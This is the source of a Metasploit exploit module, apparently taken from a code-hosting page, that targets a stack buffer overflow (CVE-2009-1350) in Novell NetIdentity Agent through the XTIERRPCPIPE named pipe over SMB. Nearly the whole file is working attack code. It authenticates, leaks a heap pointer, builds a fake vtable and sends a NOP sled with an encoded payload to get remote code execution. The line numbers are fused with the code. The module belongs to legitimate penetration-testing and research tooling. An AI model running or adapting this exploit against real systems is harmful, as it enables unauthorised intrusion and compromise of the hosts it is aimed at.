Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::SMB::Client910def initialize(info = {})11super(update_info(info,12'Name' => 'Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow',13'Description' => %q{14This module exploits a stack buffer overflow in Novell's NetIdentity Agent. When sending15a specially crafted string to the 'XTIERRPCPIPE' named pipe, an attacker may be16able to execute arbitrary code. The success of this module is much greater once the17service has been restarted.18},19'Author' => [ 'MC', 'Ruben Santamarta' ],20'License' => MSF_LICENSE,21'References' =>22[23[ 'CVE', '2009-1350' ],24[ 'OSVDB', '53351' ],25[ 'BID', '34400' ],26[ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=62&Itemid=1' ],27],28'DefaultOptions' =>29{30'EXITFUNC' => 'process', # only one shot!31},32'Payload' =>33{34'Space' => 550,35'BadChars' => "\x00\x09\x0c\x0b\x20\x0a\x0d\x5c\x5f\x2f\x2e\x40",36'StackAdjustment' => -3500,37'PrependEncoder' => "\x81\xe4\xf0\xff\xff\xff",38},39'Platform' => 'win',40'Targets' =>41[42[ 'Windows 2000 / Windows XP / Windows 2003', { 'Ret' => 0x41414141 } ],43],44'Privileged' => true,45'DisclosureDate' => '2009-04-06',46'DefaultTarget' => 0))4748register_options(49[50OptString.new('SMBUser', [ true, 'The username to authenticate as', 'metasploit'], fallbacks: ['USERNAME']),51OptString.new('SMBPass', [ true, 'The password for the specified username', 'metasploit'], fallbacks: ['PASSWORD'])52])5354deregister_options('SMB::ProtocolVersion')55end5657# don't bother with this module for autoexploitation, it creates58# false-positives on newer systems.59def autofilter60false61end6263def mem_leak64print_status("Connecting to the server...")65connect(versions: [1])6667print_status("Authenticating as user '#{datastore['SMBUser']}' with pass '#{datastore['SMBPass']}'...")6869begin70smb_login()71rescue ::Exception => e72print_error("Error: #{e}")73disconnect74return75end7677print_status("Connecting to named pipe \\XTIERRPCPIPE...")7879# If the pipe doesn't exist, bail.80begin81pipe = simple.create_pipe('\\XTIERRPCPIPE')82rescue ::Exception => e83print_error("Error: #{e}")84disconnect85return86end8788# If we get this far, do the dance.89fid = pipe.file_id9091# Need to make a Trans2 request with the param of 'QUERY_FILE_INFO' keeping our file_id92trans2 = simple.client.trans2(0x0007, [fid, 1005].pack('vv'), '')9394# Send the first request to get our pointer.95leak = [0x00000004].pack('V') + [0x00000818].pack('V')96leak << rand_text_alpha_upper(2040)9798print_status("Sending malformed request...")99pipe.write(leak)100101heap_pointer_leaked = pipe.read()[2060,4].unpack('V')[0]102print_status(sprintf("Heap Pointer leaked: 0x%.8x", heap_pointer_leaked))103104print_status("Building fake VTable...")105object = heap_pointer_leaked + 0x700106print_status(sprintf("Object: 0x%.8x", object))107method = object + 0x30108print_status(sprintf("Method: 0x%.8x", method))109shellcode = method + 0xA0110print_status(sprintf("Shellcode: 0x%.8x", shellcode))111112pipe.close113114return heap_pointer_leaked,object,method,shellcode115end116117def exploit118heap_pointer_leaked,object,method,shellcode = mem_leak()119120return if not shellcode121122sploit = [0x00000002].pack('V')123sploit << [0x00000000].pack('V')124sploit << [object].pack('V')125sploit << [0x00000000].pack('V')126sploit << rand_text_alpha_upper(240)127sploit << [object].pack('V') * 32128sploit << [method].pack('V') * 32129sploit << [shellcode].pack('V') * 32130sploit << make_nops(748)131sploit << payload.encoded132sploit << rand_text_alpha_upper(110)133134print_status("Connecting to the server...")135connect(versions: [1])136137print_status("Authenticating as user '#{datastore['SMBUser']}' with pass '#{datastore['SMBPass']}'...")138139begin140smb_login()141rescue ::Exception => e142print_error("Error: #{e}")143disconnect144return145end146147print_status("Connecting to named pipe \\XTIERRPCPIPE...")148149# If the pipe doesn't exist, bail.150begin151pipe = simple.create_pipe('\\XTIERRPCPIPE')152rescue ::Exception => e153print_error("Error: #{e}")154disconnect155return156end157158# ok, set up and send our exploit buffer...159fid = pipe.file_id160trans2 = simple.client.trans2(0x0007, [fid, 1005].pack('vv'), '')161print_status("#{sploit.length} bytes written...")162pipe.write(sploit)163164handler165disconnect166end167end168169170